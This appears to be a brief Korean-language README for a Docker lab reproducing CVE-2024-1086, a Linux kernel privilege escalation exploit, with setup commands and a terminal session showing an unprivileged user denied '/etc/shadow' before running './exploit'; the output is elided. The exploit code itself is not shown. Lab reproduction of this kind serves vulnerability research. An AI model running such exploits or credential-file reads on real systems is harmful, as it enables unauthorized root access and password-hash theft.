
조작된 바이너리를 통해 루트 액세스를 부여하는 Linux 커널 권한 상승 악용 코드인 CVE-2024-1086에 대한 Docker 기반 개념 증명입니다.
https://github.com/Notselwyn/CVE-2024-1086
docker compose up -d --build
docker exec -it poc_cve_2024_1086 bash
[tester@e23a4e5757d9 CVE-2024-1086]$ id
uid=99999(tester) gid=99999(tester) groups=99999(tester)
[tester@e23a4e5757d9 CVE-2024-1086]$ cat /etc/shadow
cat: /etc/shadow: Permission denied
[tester@e23a4e5757d9 CVE-2024-1086]$ ./exploit
...